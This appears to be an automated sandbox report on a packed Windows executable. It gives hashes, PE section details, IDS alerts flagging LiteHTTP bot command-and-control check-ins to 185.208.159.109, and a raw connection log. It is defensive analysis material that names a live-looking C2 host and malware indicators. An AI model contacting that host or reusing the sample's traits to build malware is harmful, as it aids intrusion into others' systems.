                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.9328592774034865
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:DQmU06kq9I.exe
                                        File size:1'763'328 bytes
                                        MD5:d37dab4c59e707f632bb0b91eaa87ff9
                                        SHA1:0e153debcf54805a0543646620511b57865d6fc9
                                        SHA256:375a067be10250dc045ea14025444ad7ec0662cf189abbbd393e6f7ffe85b35d
                                        SHA512:0ae81abbe56f0a20c8066c52672d969c962a20b19c7e7165b12c7b16a4f0681c4f96ce2cedde50ade5975ced262d581fc99d0947c188cec847c8a82eb85bc0ae
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        TLSH:4185338AB8F1456DCC9E86B0431FD0C76BDE792C508221BDCB6060A4693276F6CA5BE5
                                        File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`................................
                                        Icon Hash:889669d8d8299628
                                        Entrypoint:0x85a000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE
                                        Time Stamp:0x675E7DB5 [Sun Dec 15 06:56:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10055 | 0x69 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0xcd8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x101f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x2000 | 0xc000 | 0x5400 | 6f7f93910a70242b7110e0a5798312cf | False | 0.9950706845238095 | data | 7.964759279856404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xe000 | 0xcd8 | 0xe00 | 0e166fb982c23b87e81342707752f30e | False | 0.33175223214285715 | data | 3.8103289780727865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x10000 | 0x2000 | 0x200 | c5fa453236d44d94fedf773411bc9006 | False | 0.150390625 | data | 0.9342685949460681 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x12000 | 0x2a2000 | 0x200 | 2f858a1ba3c1b1add9d83a0de4b4e4af | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| fsrfimey | 0x2b4000 | 0x1a4000 | 0x1a3c00 | 61df25f4ba7966b0342595c001aa689f | False | 0.9949264117406195 | data | 7.953315584919624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| mhpawist | 0x458000 | 0x2000 | 0x400 | 6fa68b4dc94bf991144fa8891d94fcf0 | False | 0.80078125 | data | 6.274634545404948 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x45a000 | 0x4000 | 0x2200 | 3c08f71781e751512be92420a1a33dc5 | False | 0.0625 | DOS executable (COM) | 0.7178556540423161 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xe130 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.299390243902439 |
| RT_GROUP_ICON | 0xe798 | 0x14 | data | | | 1.1 |
| RT_VERSION | 0xe7ac | 0x394 | OpenPGP Secret Key | | | 0.39192139737991266 |
| RT_MANIFEST | 0xeb40 | 0x198 | ASCII text, with CRLF line terminators | | | 0.5833333333333334 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-17T10:20:18.128651+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:19.143774+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:19.143774+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:35.925260+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:36.924933+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:36.924933+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:55.472043+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:56.558753+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:20:56.558753+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:12.644070+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:13.643978+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:13.643978+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:28.706502+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:29.722238+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:29.722238+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:31.550246+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:32.560184+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:32.560184+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:37.207748+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:38.143751+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:38.143751+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:43.738125+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:44.722069+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:44.722069+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:54.362643+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:55.440621+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:55.440621+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:56.034479+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:57.144479+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:21:57.144479+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:11.660045+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:12.722386+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:12.722386+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:14.222561+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:15.331500+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:15.331500+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:29.597040+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:30.456639+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49988 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:30.612546+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:30.612546+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:31.612580+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49988 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:31.612580+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49988 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:36.347067+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49989 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:37.331293+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49989 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:37.331293+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49989 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:46.487687+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49990 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:47.518810+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49990 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:47.518810+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49990 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:55.472046+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49991 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:56.440691+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49991 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:22:56.440691+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49991 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:13.456404+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49992 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:14.518821+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49992 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:14.518821+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49992 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:21.034585+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49993 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:21.638539+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49993 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:21.638539+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49993 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:23.706595+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49995 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:24.690730+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49995 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:24.690730+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49995 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:31.987653+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.5 | 49996 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:32.971952+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.5 | 49996 | 185.208.159.109 | 80 | TCP |
| 2024-12-17T10:23:32.971952+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.5 | 49996 | 185.208.159.109 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Dec 17, 2024 10:22:29.249602079 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.250087976 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.250087976 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.369831085 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.597039938 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.785959959 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.988481045 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.988909006 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.108258963 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.108683109 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.108869076 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.108968019 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.228631020 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.456639051 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.530515909 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.577871084 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.612545967 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.764267921 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.925069094 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:31.387343884 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:31.612580061 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:31.620615005 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:31.721963882 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.540946960 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:35.542074919 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.868340969 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.868696928 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.988785982 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:35.988806963 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:35.988897085 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.989118099 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:36.108777046 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:36.347067118 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:36.396080971 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:36.396568060 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:36.467089891 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:37.269721031 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:37.331293106 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:37.504338980 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:37.643898964 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:42.277895927 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:42.278065920 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.014787912 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.015959024 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.134814024 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:46.135683060 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:46.135871887 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.135905981 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.255682945 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:46.487687111 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.607511044 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:47.413961887 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:47.518810034 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:47.648416042 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:47.721990108 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:52.423094988 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:52.423284054 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:54.999517918 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.000072956 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.119362116 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:55.119924068 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:55.119995117 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.120124102 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.240777969 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:55.472045898 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.591912031 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:56.399256945 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:56.440690994 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:56.632327080 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:56.831357002 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:01.407948971 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:01.408158064 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:12.978766918 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:12.979238987 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.098814964 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:13.099111080 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:13.101869106 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.101975918 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.221827030 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:13.456403971 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.576322079 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:14.379671097 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:14.518821001 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:14.616410971 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:14.721966982 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.273072958 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.274441957 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.386686087 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:19.386785984 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.393325090 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:19.394315958 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:19.394386053 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:20.681636095 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:20.801515102 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.034584999 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:21.092236042 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.144026041 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:21.154747963 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.449776888 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.638539076 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.230217934 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.352770090 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:23.352897882 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.353261948 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.473125935 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:23.706594944 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.826451063 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:24.637139082 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:24.690730095 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:24.868328094 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:24.909487963 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:26.453879118 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:26.453952074 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:29.644222975 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:29.644296885 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.519593000 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.519648075 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.639497042 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:31.639527082 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:31.639671087 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.639780045 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.759484053 CET8049996185.208.159.109192.168.2.5
